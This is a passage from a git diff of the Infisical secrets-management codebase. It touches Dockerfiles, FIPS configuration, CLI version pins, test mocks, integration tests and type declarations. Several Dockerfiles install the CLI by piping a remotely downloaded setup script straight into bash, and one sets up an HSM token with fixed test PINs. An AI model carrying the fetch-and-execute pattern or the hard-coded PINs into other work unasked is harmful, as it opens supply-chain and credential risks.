||||
WORKDIR /
|
||||
|
||||
COPY --from=backend-runner /app /backend
|
||||
|
||||
@ -181,20 +166,13 @@ ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
|
||||
|
||||
ENV PORT 8080
|
||||
ENV HOST=0.0.0.0
|
||||
ENV HTTPS_ENABLED false
|
||||
ENV HTTPS_ENABLED false
|
||||
ENV NODE_ENV production
|
||||
ENV STANDALONE_BUILD true
|
||||
ENV STANDALONE_BUILD true
|
||||
ENV STANDALONE_MODE true
|
||||
ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/
|
||||
ENV NODE_OPTIONS="--max-old-space-size=1024"
|
||||
|
||||
# FIPS mode of operation:
|
||||
ENV OPENSSL_CONF=/backend/nodejs.fips.cnf
|
||||
ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
|
||||
ENV NODE_OPTIONS=--force-fips
|
||||
ENV FIPS_ENABLED=true
|
||||
|
||||
|
||||
WORKDIR /backend
|
||||
|
||||
ENV TELEMETRY_ENABLED true
|
||||
@ -202,10 +180,6 @@ ENV TELEMETRY_ENABLED true
|
||||
EXPOSE 8080
|
||||
EXPOSE 443
|
||||
|
||||
# Remove telemetry. dd-trace uses BullMQ with MD5 hashing, which breaks when FIPS mode is enabled.
|
||||
RUN grep -v 'import "./lib/telemetry/instrumentation.mjs";' dist/main.mjs > dist/main.mjs.tmp && \
|
||||
mv dist/main.mjs.tmp dist/main.mjs
|
||||
|
||||
USER non-root-user
|
||||
|
||||
CMD ["./standalone-entrypoint.sh"]
|
||||
CMD ["./standalone-entrypoint.sh"]
|
||||
|
@ -20,7 +20,7 @@ WORKDIR /app
|
||||
|
||||
# Copy dependencies
|
||||
COPY --from=frontend-dependencies /app/node_modules ./node_modules
|
||||
# Copy all files
|
||||
# Copy all files
|
||||
COPY /frontend .
|
||||
|
||||
ENV NODE_ENV production
|
||||
@ -33,8 +33,7 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
|
||||
ARG INFISICAL_PLATFORM_VERSION
|
||||
ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
|
||||
ARG CAPTCHA_SITE_KEY
|
||||
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
|
||||
ENV NODE_OPTIONS="--max-old-space-size=8192"
|
||||
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
|
||||
|
||||
# Build
|
||||
RUN npm run build
|
||||
@ -78,7 +77,6 @@ RUN npm ci --only-production
|
||||
COPY /backend .
|
||||
COPY --chown=non-root-user:nodejs standalone-entrypoint.sh standalone-entrypoint.sh
|
||||
RUN npm i -D tsconfig-paths
|
||||
ENV NODE_OPTIONS="--max-old-space-size=8192"
|
||||
RUN npm run build
|
||||
|
||||
# Production stage
|
||||
@ -130,7 +128,7 @@ RUN apt-get update && apt-get install -y \
|
||||
|
||||
# Install Infisical CLI
|
||||
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
|
||||
&& apt-get update && apt-get install -y infisical=0.41.89 \
|
||||
&& apt-get update && apt-get install -y infisical=0.41.2 \
|
||||
&& rm -rf /var/lib/apt/lists/*
|
||||
|
||||
WORKDIR /
|
||||
@ -166,9 +164,9 @@ ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
|
||||
|
||||
ENV PORT 8080
|
||||
ENV HOST=0.0.0.0
|
||||
ENV HTTPS_ENABLED false
|
||||
ENV HTTPS_ENABLED false
|
||||
ENV NODE_ENV production
|
||||
ENV STANDALONE_BUILD true
|
||||
ENV STANDALONE_BUILD true
|
||||
ENV STANDALONE_MODE true
|
||||
ENV NODE_OPTIONS="--max-old-space-size=1024"
|
||||
|
||||
|
@ -9,7 +9,7 @@ RUN apt-get update && apt-get install -y \
|
||||
make \
|
||||
g++ \
|
||||
openssh-client \
|
||||
openssl
|
||||
openssl
|
||||
|
||||
# Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
|
||||
RUN apt-get install -y \
|
||||
@ -55,10 +55,10 @@ COPY --from=build /app .
|
||||
# Install Infisical CLI
|
||||
RUN apt-get install -y curl bash && \
|
||||
curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
|
||||
apt-get update && apt-get install -y infisical=0.41.89 git
|
||||
apt-get update && apt-get install -y infisical=0.41.2 git
|
||||
|
||||
HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \
|
||||
CMD node healthcheck.js
|
||||
HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \
|
||||
CMD node healthcheck.js
|
||||
|
||||
ENV HOST=0.0.0.0
|
||||
|
||||
|
@ -57,7 +57,7 @@ RUN mkdir -p /etc/softhsm2/tokens && \
|
||||
# Install Infisical CLI
|
||||
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
|
||||
apt-get update && \
|
||||
apt-get install -y infisical=0.41.89
|
||||
apt-get install -y infisical=0.41.2
|
||||
|
||||
WORKDIR /app
|
||||
|
||||
|
@ -52,7 +52,7 @@ RUN apt-get install -y opensc
|
||||
|
||||
RUN mkdir -p /etc/softhsm2/tokens && \
|
||||
softhsm2-util --init-token --slot 0 --label "auth-app" --pin 1234 --so-pin 0000
|
||||
|
||||
|
||||
WORKDIR /openssl-build
|
||||
RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
|
||||
&& tar -xf openssl-3.1.2.tar.gz \
|
||||
@ -66,7 +66,7 @@ RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
|
||||
# Install Infisical CLI
|
||||
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
|
||||
apt-get update && \
|
||||
apt-get install -y infisical=0.41.89
|
||||
apt-get install -y infisical=0.41.2
|
||||
|
||||
WORKDIR /app
|
||||
|
||||
@ -78,9 +78,8 @@ RUN npm install
|
||||
COPY . .
|
||||
|
||||
ENV HOST=0.0.0.0
|
||||
ENV OPENSSL_CONF=/app/nodejs.fips.cnf
|
||||
ENV OPENSSL_CONF=/app/nodejs.cnf
|
||||
ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
|
||||
# ENV NODE_OPTIONS=--force-fips # Note(Daniel): We can't set this on the node options because it may break for existing folks using the infisical/infisical-fips image. Instead we call crypto.setFips(true) at runtime.
|
||||
ENV FIPS_ENABLED=true
|
||||
ENV NODE_OPTIONS=--force-fips
|
||||
|
||||
CMD ["npm", "run", "dev:docker"]
|
||||
|
@ -8,9 +8,6 @@ import { Lock } from "@app/lib/red-lock";
|
||||
export const mockKeyStore = (): TKeyStoreFactory => {
|
||||
const store: Record<string, string | number | Buffer> = {};
|
||||
|
||||
const getRegex = (pattern: string) =>
|
||||
new RE2(`^${pattern.replace(/[-[\]/{}()+?.\\^$|]/g, "\\$&").replace(/\*/g, ".*")}$`);
|
||||
|
||||
return {
|
||||
setItem: async (key, value) => {
|
||||
store[key] = value;
|
||||
@ -26,7 +23,7 @@ export const mockKeyStore = (): TKeyStoreFactory => {
|
||||
return 1;
|
||||
},
|
||||
deleteItems: async ({ pattern, batchSize = 500, delay = 1500, jitter = 200 }) => {
|
||||
const regex = getRegex(pattern);
|
||||
const regex = new RE2(`^${pattern.replace(/[-[\]/{}()+?.\\^$|]/g, "\\$&").replace(/\*/g, ".*")}$`);
|
||||
let totalDeleted = 0;
|
||||
const keys = Object.keys(store);
|
||||
|
||||
@ -56,27 +53,6 @@ export const mockKeyStore = (): TKeyStoreFactory => {
|
||||
incrementBy: async () => {
|
||||
return 1;
|
||||
},
|
||||
getItems: async (keys) => {
|
||||
const values = keys.map((key) => {
|
||||
const value = store[key];
|
||||
if (typeof value === "string") {
|
||||
return value;
|
||||
}
|
||||
return null;
|
||||
});
|
||||
return values;
|
||||
},
|
||||
getKeysByPattern: async (pattern) => {
|
||||
const regex = getRegex(pattern);
|
||||
const keys = Object.keys(store);
|
||||
return keys.filter((key) => regex.test(key));
|
||||
},
|
||||
deleteItemsByKeyIn: async (keys) => {
|
||||
for (const key of keys) {
|
||||
delete store[key];
|
||||
}
|
||||
return keys.length;
|
||||
},
|
||||
acquireLock: () => {
|
||||
return Promise.resolve({
|
||||
release: () => {}
|
||||
|
@ -26,7 +26,6 @@ export const mockQueue = (): TQueueServiceFactory => {
|
||||
getRepeatableJobs: async () => [],
|
||||
clearQueue: async () => {},
|
||||
stopJobById: async () => {},
|
||||
stopJobByIdPg: async () => {},
|
||||
stopRepeatableJobByJobId: async () => true,
|
||||
stopRepeatableJobByKey: async () => true
|
||||
};
|
||||
|
@ -1,9 +1,8 @@
|
||||
import crypto from "node:crypto";
|
||||
|
||||
import { SecretType, TSecrets } from "@app/db/schemas";
|
||||
import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
|
||||
import { initEnvConfig } from "@app/lib/config/env";
|
||||
import { SymmetricKeySize } from "@app/lib/crypto";
|
||||
import { crypto } from "@app/lib/crypto/cryptography";
|
||||
import { initLogger, logger } from "@app/lib/logger";
|
||||
import { decryptAsymmetric, decryptSymmetric128BitHexKeyUTF8, encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
|
||||
|
||||
const createServiceToken = async (
|
||||
scopes: { environment: string; secretPath: string }[],
|
||||
@ -27,8 +26,7 @@ const createServiceToken = async (
|
||||
});
|
||||
const { user: userInfo } = JSON.parse(userInfoRes.payload);
|
||||
const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
|
||||
|
||||
const projectKey = crypto.encryption().asymmetric().decrypt({
|
||||
const projectKey = decryptAsymmetric({
|
||||
ciphertext: projectKeyEnc.encryptedKey,
|
||||
nonce: projectKeyEnc.nonce,
|
||||
publicKey: projectKeyEnc.sender.publicKey,
|
||||
@ -36,13 +34,7 @@ const createServiceToken = async (
|
||||
});
|
||||
|
||||
const randomBytes = crypto.randomBytes(16).toString("hex");
|
||||
|
||||
const { ciphertext, iv, tag } = crypto.encryption().symmetric().encrypt({
|
||||
plaintext: projectKey,
|
||||
key: randomBytes,
|
||||
keySize: SymmetricKeySize.Bits128
|
||||
});
|
||||
|
||||
const { ciphertext, iv, tag } = encryptSymmetric128BitHexKeyUTF8(projectKey, randomBytes);
|
||||
const serviceTokenRes = await testServer.inject({
|
||||
method: "POST",
|
||||
url: "/api/v2/service-token",
|
||||
@ -145,9 +137,6 @@ describe("Service token secret ops", async () => {
|
||||
let projectKey = "";
|
||||
let folderId = "";
|
||||
beforeAll(async () => {
|
||||
initLogger();
|
||||
await initEnvConfig(testSuperAdminDAL, logger);
|
||||
|
||||
serviceToken = await createServiceToken(
|
||||
[{ secretPath: "/**", environment: seedData1.environment.slug }],
|
||||
["read", "write"]
|
||||
@ -164,13 +153,11 @@ describe("Service token secret ops", async () => {
|
||||
expect(serviceTokenInfoRes.statusCode).toBe(200);
|
||||
const serviceTokenInfo = serviceTokenInfoRes.json();
|
||||
const serviceTokenParts = serviceToken.split(".");
|
||||
|
||||
projectKey = crypto.encryption().symmetric().decrypt({
|
||||
projectKey = decryptSymmetric128BitHexKeyUTF8({
|
||||
key: serviceTokenParts[3],
|
||||
tag: serviceTokenInfo.tag,
|
||||
ciphertext: serviceTokenInfo.encryptedKey,
|
||||
iv: serviceTokenInfo.iv,
|
||||
keySize: SymmetricKeySize.Bits128
|
||||
iv: serviceTokenInfo.iv
|
||||
});
|
||||
|
||||
// create a deep folder
|
||||
|
@ -1,8 +1,6 @@
|
||||
import { SecretType, TSecrets } from "@app/db/schemas";
|
||||
import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
|
||||
import { initEnvConfig } from "@app/lib/config/env";
|
||||
import { crypto } from "@app/lib/crypto/cryptography";
|
||||
import { initLogger, logger } from "@app/lib/logger";
|
||||
import { decryptAsymmetric, encryptAsymmetric } from "@app/lib/crypto";
|
||||
import { AuthMode } from "@app/services/auth/auth-type";
|
||||
|
||||
const createSecret = async (dto: {
|
||||
@ -157,9 +155,6 @@ describe("Secret V3 Router", async () => {
|
||||
let projectKey = "";
|
||||
let folderId = "";
|
||||
beforeAll(async () => {
|
||||
initLogger();
|
||||
await initEnvConfig(testSuperAdminDAL, logger);
|
||||
|
||||
const projectKeyRes = await testServer.inject({
|
||||
method: "GET",
|
||||
url: `/api/v2/workspace/${seedData1.project.id}/encrypted-key`,
|
||||
@ -178,7 +173,7 @@ describe("Secret V3 Router", async () => {
|
||||
});
|
||||
const { user: userInfo } = JSON.parse(userInfoRes.payload);
|
||||
const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
|
||||
projectKey = crypto.encryption().asymmetric().decrypt({
|
||||
projectKey = decryptAsymmetric({
|
||||
ciphertext: projectKeyEncryptionDetails.encryptedKey,
|
||||
nonce: projectKeyEncryptionDetails.nonce,
|
||||
publicKey: projectKeyEncryptionDetails.sender.publicKey,
|
||||
@ -674,7 +669,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
|
||||
const { user: userInfo } = JSON.parse(userInfoRes.payload);
|
||||
|
||||
const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
|
||||
const projectKey = crypto.encryption().asymmetric().decrypt({
|
||||
const projectKey = decryptAsymmetric({
|
||||
ciphertext: projectKeyEnc.encryptedKey,
|
||||
nonce: projectKeyEnc.nonce,
|
||||
publicKey: projectKeyEnc.sender.publicKey,
|
||||
@ -690,7 +685,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
|
||||
});
|
||||
expect(projectBotRes.statusCode).toEqual(200);
|
||||
const projectBot = JSON.parse(projectBotRes.payload).bot;
|
||||
const botKey = crypto.encryption().asymmetric().encrypt(projectKey, projectBot.publicKey, privateKey);
|
||||
const botKey = encryptAsymmetric(projectKey, projectBot.publicKey, privateKey);
|
||||
|
||||
// set bot as active
|
||||
const setBotActive = await testServer.inject({
|
||||
|
@ -2,11 +2,11 @@
|
||||
import "ts-node/register";
|
||||
|
||||
import dotenv from "dotenv";
|
||||
import { crypto } from "@app/lib/crypto/cryptography";
|
||||
import jwt from "jsonwebtoken";
|
||||
import path from "path";
|
||||
|
||||
import { seedData1 } from "@app/db/seed-data";
|
||||
import { getDatabaseCredentials, initEnvConfig } from "@app/lib/config/env";
|
||||
import { initEnvConfig } from "@app/lib/config/env";
|
||||
import { initLogger } from "@app/lib/logger";
|
||||
import { main } from "@app/server/app";
|
||||
import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
|
||||
@ -17,7 +17,6 @@ import { queueServiceFactory } from "@app/queue";
|
||||
import { keyStoreFactory } from "@app/keystore/keystore";
|
||||
import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
|
||||
import { buildRedisFromConfig } from "@app/lib/config/redis";
|
||||
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
dotenv.config({ path: path.join(__dirname, "../../.env.test"), debug: true });
|
||||
export default {
|
||||
@ -25,17 +24,13 @@ export default {
|
||||
transformMode: "ssr",
|
||||
async setup() {
|
||||
const logger = initLogger();
|
||||
const databaseCredentials = getDatabaseCredentials(logger);
|
||||
|
||||
const envConfig = initEnvConfig(logger);
|
||||
const db = initDbConnection({
|
||||
dbConnectionUri: databaseCredentials.dbConnectionUri,
|
||||
dbRootCert: databaseCredentials.dbRootCert
|
||||
dbConnectionUri: envConfig.DB_CONNECTION_URI,
|
||||
dbRootCert: envConfig.DB_ROOT_CERT
|
||||
});
|
||||
|
||||
const superAdminDAL = superAdminDALFactory(db);
|
||||
const envCfg = await initEnvConfig(superAdminDAL, logger);
|
||||
|
||||
const redis = buildRedisFromConfig(envCfg);
|
||||
const redis = buildRedisFromConfig(envConfig);
|
||||
await redis.flushdb("SYNC");
|
||||
|
||||
try {
|
||||
@ -60,10 +55,10 @@ export default {
|
||||
});
|
||||
|
||||
const smtp = mockSmtpServer();
|
||||
const queue = queueServiceFactory(envCfg, { dbConnectionUrl: envCfg.DB_CONNECTION_URI });
|
||||
const keyStore = keyStoreFactory(envCfg);
|
||||
const queue = queueServiceFactory(envConfig, { dbConnectionUrl: envConfig.DB_CONNECTION_URI });
|
||||
const keyStore = keyStoreFactory(envConfig);
|
||||
|
||||
const hsmModule = initializeHsmModule(envCfg);
|
||||
const hsmModule = initializeHsmModule(envConfig);
|
||||
hsmModule.initialize();
|
||||
|
||||
const server = await main({
|
||||
@ -73,17 +68,14 @@ export default {
|
||||
queue,
|
||||
keyStore,
|
||||
hsmModule: hsmModule.getModule(),
|
||||
superAdminDAL,
|
||||
redis,
|
||||
envConfig: envCfg
|
||||
envConfig
|
||||
});
|
||||
|
||||
// @ts-expect-error type
|
||||
globalThis.testServer = server;
|
||||
// @ts-expect-error type
|
||||
globalThis.testSuperAdminDAL = superAdminDAL;
|
||||
// @ts-expect-error type
|
||||
globalThis.jwtAuthToken = crypto.jwt().sign(
|
||||
globalThis.jwtAuthToken = jwt.sign(
|
||||
{
|
||||
authTokenType: AuthTokenType.ACCESS_TOKEN,
|
||||
userId: seedData1.id,
|
||||
@ -92,8 +84,8 @@ export default {
|
||||
organizationId: seedData1.organization.id,
|
||||
accessVersion: 1
|
||||
},
|
||||
envCfg.AUTH_SECRET,
|
||||
{ expiresIn: envCfg.JWT_AUTH_LIFETIME }
|
||||
envConfig.AUTH_SECRET,
|
||||
{ expiresIn: envConfig.JWT_AUTH_LIFETIME }
|
||||
);
|
||||
} catch (error) {
|
||||
// eslint-disable-next-line
|
||||
@ -110,8 +102,6 @@ export default {
|
||||
// @ts-expect-error type
|
||||
delete globalThis.testServer;
|
||||
// @ts-expect-error type
|
||||
delete globalThis.testSuperAdminDAL;
|
||||
// @ts-expect-error type
|
||||
delete globalThis.jwtToken;
|
||||
// called after all tests with this env have been run
|
||||
await db.migrate.rollback(
|
||||
|
988
backend/package-lock.json
generated
988
backend/package-lock.json
generated
File diff suppressed because it is too large
Load Diff
@ -84,7 +84,6 @@
|
||||
"@babel/plugin-syntax-import-attributes": "^7.24.7",
|
||||
"@babel/preset-env": "^7.18.10",
|
||||
"@babel/preset-react": "^7.24.7",
|
||||
"@smithy/types": "^4.3.1",
|
||||
"@types/bcrypt": "^5.0.2",
|
||||
"@types/jmespath": "^0.15.2",
|
||||
"@types/jsonwebtoken": "^9.0.5",
|
||||
@ -150,7 +149,6 @@
|
||||
"@fastify/static": "^7.0.4",
|
||||
"@fastify/swagger": "^8.14.0",
|
||||
"@fastify/swagger-ui": "^2.1.0",
|
||||
"@gitbeaker/rest": "^42.5.0",
|
||||
"@google-cloud/kms": "^4.5.0",
|
||||
"@infisical/quic": "^1.0.8",
|
||||
"@node-saml/passport-saml": "^5.0.1",
|
||||
|
@ -84,11 +84,6 @@ const getZodDefaultValue = (type: unknown, value: string | number | boolean | Ob
|
||||
}
|
||||
};
|
||||
|
||||
const bigIntegerColumns: Record<string, string[]> = {
|
||||
"folder_commits": ["commitId"]
|
||||
};
|
||||
|
||||
|
||||
const main = async () => {
|
||||
const tables = (
|
||||
await db("information_schema.tables")
|
||||
@ -113,9 +108,6 @@ const main = async () => {
|
||||
const columnName = columnNames[colNum];
|
||||
const colInfo = columns[columnName];
|
||||
let ztype = getZodPrimitiveType(colInfo.type);
|
||||
if (bigIntegerColumns[tableName]?.includes(columnName)) {
|
||||
ztype = "z.coerce.bigint()";
|
||||
}
|
||||
if (["zodBuffer"].includes(ztype)) {
|
||||
zodImportSet.add(ztype);
|
||||
}
|
||||
|
2
backend/src/@types/fastify-zod.d.ts
vendored
2
backend/src/@types/fastify-zod.d.ts
vendored
@ -2,7 +2,6 @@ import { FastifyInstance, RawReplyDefaultExpression, RawRequestDefaultExpression
|
||||
|
||||
import { CustomLogger } from "@app/lib/logger/logger";
|
||||
import { ZodTypeProvider } from "@app/server/plugins/fastify-zod";
|
||||
import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
declare global {
|
||||
type FastifyZodProvider = FastifyInstance<
|
||||
@ -15,6 +14,5 @@ declare global {
|
||||
|
||||
// used only for testing
|
||||
const testServer: FastifyZodProvider;
|
||||
const testSuperAdminDAL: TSuperAdminDALFactory;
|
||||
const jwtAuthToken: string;
|
||||
}
|
||||
|
48
backend/src/@types/fastify.d.ts
vendored
48
backend/src/@types/fastify.d.ts
vendored
@ -3,15 +3,16 @@ import "fastify";
|
||||
import { Redis } from "ioredis";
|
||||
|
||||
import { TUsers } from "@app/db/schemas";
|
||||
import { TAccessApprovalPolicyServiceFactory } from "@app/ee/services/access-approval-policy/access-approval-policy-types";
|
||||
import { TAccessApprovalRequestServiceFactory } from "@app/ee/services/access-approval-request/access-approval-request-types";
|
||||
import { TAssumePrivilegeServiceFactory } from "@app/ee/services/assume-privilege/assume-privilege-types";
|
||||
import { TAuditLogServiceFactory, TCreateAuditLogDTO } from "@app/ee/services/audit-log/audit-log-types";
|
||||
import { TAuditLogStreamServiceFactory } from "@app/ee/services/audit-log-stream/audit-log-stream-types";
|
||||
import { TCertificateAuthorityCrlServiceFactory } from "@app/ee/services/certificate-authority-crl/certificate-authority-crl-types";
|
||||
import { TAccessApprovalPolicyServiceFactory } from "@app/ee/services/access-approval-policy/access-approval-policy-service";
|
||||
import { TAccessApprovalRequestServiceFactory } from "@app/ee/services/access-approval-request/access-approval-request-service";
|
||||
import { TAssumePrivilegeServiceFactory } from "@app/ee/services/assume-privilege/assume-privilege-service";
|
||||
import { TAuditLogServiceFactory } from "@app/ee/services/audit-log/audit-log-service";
|
||||
import { TCreateAuditLogDTO } from "@app/ee/services/audit-log/audit-log-types";
|
||||
import { TAuditLogStreamServiceFactory } from "@app/ee/services/audit-log-stream/audit-log-stream-service";
|
||||
import { TCertificateAuthorityCrlServiceFactory } from "@app/ee/services/certificate-authority-crl/certificate-authority-crl-service";
|
||||
import { TCertificateEstServiceFactory } from "@app/ee/services/certificate-est/certificate-est-service";
|
||||
import { TDynamicSecretServiceFactory } from "@app/ee/services/dynamic-secret/dynamic-secret-types";
|
||||
import { TDynamicSecretLeaseServiceFactory } from "@app/ee/services/dynamic-secret-lease/dynamic-secret-lease-types";
|
||||
import { TDynamicSecretServiceFactory } from "@app/ee/services/dynamic-secret/dynamic-secret-service";
|
||||
import { TDynamicSecretLeaseServiceFactory } from "@app/ee/services/dynamic-secret-lease/dynamic-secret-lease-service";
|
||||
import { TExternalKmsServiceFactory } from "@app/ee/services/external-kms/external-kms-service";
|
||||
import { TGatewayServiceFactory } from "@app/ee/services/gateway/gateway-service";
|
||||
import { TGithubOrgSyncServiceFactory } from "@app/ee/services/github-org-sync/github-org-sync-service";
|
||||
@ -24,25 +25,24 @@ import { TKmipServiceFactory } from "@app/ee/services/kmip/kmip-service";
|
||||
import { TLdapConfigServiceFactory } from "@app/ee/services/ldap-config/ldap-config-service";
|
||||
import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
|
||||
import { TOidcConfigServiceFactory } from "@app/ee/services/oidc/oidc-config-service";
|
||||
import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
|
||||
import { TPitServiceFactory } from "@app/ee/services/pit/pit-service";
|
||||
import { TProjectTemplateServiceFactory } from "@app/ee/services/project-template/project-template-types";
|
||||
import { TProjectUserAdditionalPrivilegeServiceFactory } from "@app/ee/services/project-user-additional-privilege/project-user-additional-privilege-types";
|
||||
import { RateLimitConfiguration, TRateLimitServiceFactory } from "@app/ee/services/rate-limit/rate-limit-types";
|
||||
import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-config-types";
|
||||
import { TScimServiceFactory } from "@app/ee/services/scim/scim-types";
|
||||
import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service";
|
||||
import { TProjectTemplateServiceFactory } from "@app/ee/services/project-template/project-template-service";
|
||||
import { TProjectUserAdditionalPrivilegeServiceFactory } from "@app/ee/services/project-user-additional-privilege/project-user-additional-privilege-service";
|
||||
import { TRateLimitServiceFactory } from "@app/ee/services/rate-limit/rate-limit-service";
|
||||
import { RateLimitConfiguration } from "@app/ee/services/rate-limit/rate-limit-types";
|
||||
import { TSamlConfigServiceFactory } from "@app/ee/services/saml-config/saml-config-service";
|
||||
import { TScimServiceFactory } from "@app/ee/services/scim/scim-service";
|
||||
import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-service";
|
||||
import { TSecretApprovalRequestServiceFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-service";
|
||||
import { TSecretRotationServiceFactory } from "@app/ee/services/secret-rotation/secret-rotation-service";
|
||||
import { TSecretRotationV2ServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-service";
|
||||
import { TSecretScanningServiceFactory } from "@app/ee/services/secret-scanning/secret-scanning-service";
|
||||
import { TSecretScanningV2ServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-service";
|
||||
import { TSecretSnapshotServiceFactory } from "@app/ee/services/secret-snapshot/secret-snapshot-service";
|
||||
import { TSshCertificateAuthorityServiceFactory } from "@app/ee/services/ssh/ssh-certificate-authority-service";
|
||||
import { TSshCertificateTemplateServiceFactory } from "@app/ee/services/ssh-certificate-template/ssh-certificate-template-service";
|
||||
import { TSshHostServiceFactory } from "@app/ee/services/ssh-host/ssh-host-service";
|
||||
import { TSshHostGroupServiceFactory } from "@app/ee/services/ssh-host-group/ssh-host-group-service";
|
||||
import { TTrustedIpServiceFactory } from "@app/ee/services/trusted-ip/trusted-ip-types";
|
||||
import { TTrustedIpServiceFactory } from "@app/ee/services/trusted-ip/trusted-ip-service";
|
||||
import { TAuthMode } from "@app/server/plugins/auth/inject-identity";
|
||||
import { TApiKeyServiceFactory } from "@app/services/api-key/api-key-service";
|
||||
import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service";
|
||||
@ -58,12 +58,10 @@ import { TCertificateTemplateServiceFactory } from "@app/services/certificate-te
|
||||
import { TCmekServiceFactory } from "@app/services/cmek/cmek-service";
|
||||
import { TExternalGroupOrgRoleMappingServiceFactory } from "@app/services/external-group-org-role-mapping/external-group-org-role-mapping-service";
|
||||
import { TExternalMigrationServiceFactory } from "@app/services/external-migration/external-migration-service";
|
||||
import { TFolderCommitServiceFactory } from "@app/services/folder-commit/folder-commit-service";
|
||||
import { TGroupProjectServiceFactory } from "@app/services/group-project/group-project-service";
|
||||
import { THsmServiceFactory } from "@app/services/hsm/hsm-service";
|
||||
import { TIdentityServiceFactory } from "@app/services/identity/identity-service";
|
||||
import { TIdentityAccessTokenServiceFactory } from "@app/services/identity-access-token/identity-access-token-service";
|
||||
import { TIdentityAliCloudAuthServiceFactory } from "@app/services/identity-alicloud-auth/identity-alicloud-auth-service";
|
||||
import { TIdentityAwsAuthServiceFactory } from "@app/services/identity-aws-auth/identity-aws-auth-service";
|
||||
import { TIdentityAzureAuthServiceFactory } from "@app/services/identity-azure-auth/identity-azure-auth-service";
|
||||
import { TIdentityGcpAuthServiceFactory } from "@app/services/identity-gcp-auth/identity-gcp-auth-service";
|
||||
@ -74,7 +72,6 @@ import { TAllowedFields } from "@app/services/identity-ldap-auth/identity-ldap-a
|
||||
import { TIdentityOciAuthServiceFactory } from "@app/services/identity-oci-auth/identity-oci-auth-service";
|
||||
import { TIdentityOidcAuthServiceFactory } from "@app/services/identity-oidc-auth/identity-oidc-auth-service";
|
||||
import { TIdentityProjectServiceFactory } from "@app/services/identity-project/identity-project-service";
|
||||
import { TIdentityTlsCertAuthServiceFactory } from "@app/services/identity-tls-cert-auth/identity-tls-cert-auth-types";
|
||||
import { TIdentityTokenAuthServiceFactory } from "@app/services/identity-token-auth/identity-token-auth-service";
|
||||
import { TIdentityUaServiceFactory } from "@app/services/identity-ua/identity-ua-service";
|
||||
import { TIntegrationServiceFactory } from "@app/services/integration/integration-service";
|
||||
@ -86,7 +83,6 @@ import { TOrgAdminServiceFactory } from "@app/services/org-admin/org-admin-servi
|
||||
import { TPkiAlertServiceFactory } from "@app/services/pki-alert/pki-alert-service";
|
||||
import { TPkiCollectionServiceFactory } from "@app/services/pki-collection/pki-collection-service";
|
||||
import { TPkiSubscriberServiceFactory } from "@app/services/pki-subscriber/pki-subscriber-service";
|
||||
import { TPkiTemplatesServiceFactory } from "@app/services/pki-templates/pki-templates-service";
|
||||
import { TProjectServiceFactory } from "@app/services/project/project-service";
|
||||
import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service";
|
||||
import { TProjectEnvServiceFactory } from "@app/services/project-env/project-env-service";
|
||||
@ -121,10 +117,6 @@ declare module "@fastify/request-context" {
|
||||
oidc?: {
|
||||
claims: Record<string, string>;
|
||||
};
|
||||
kubernetes?: {
|
||||
namespace: string;
|
||||
name: string;
|
||||
};
|
||||
};
|
||||
identityPermissionMetadata?: Record<string, unknown>; // filled by permission service
|
||||
assumedPrivilegeDetails?: { requesterId: string; actorId: string; actorType: ActorType; projectId: string };
|
||||
@ -218,8 +210,6 @@ declare module "fastify" {
|
||||
identityUa: TIdentityUaServiceFactory;
|
||||
identityKubernetesAuth: TIdentityKubernetesAuthServiceFactory;
|
||||
identityGcpAuth: TIdentityGcpAuthServiceFactory;
|
||||
identityAliCloudAuth: TIdentityAliCloudAuthServiceFactory;
|
||||
identityTlsCertAuth: TIdentityTlsCertAuthServiceFactory;
|
||||
identityAwsAuth: TIdentityAwsAuthServiceFactory;
|
||||
identityAzureAuth: TIdentityAzureAuthServiceFactory;
|
||||
identityOciAuth: TIdentityOciAuthServiceFactory;
|
||||
@ -280,11 +270,7 @@ declare module "fastify" {
|
||||
microsoftTeams: TMicrosoftTeamsServiceFactory;
|
||||
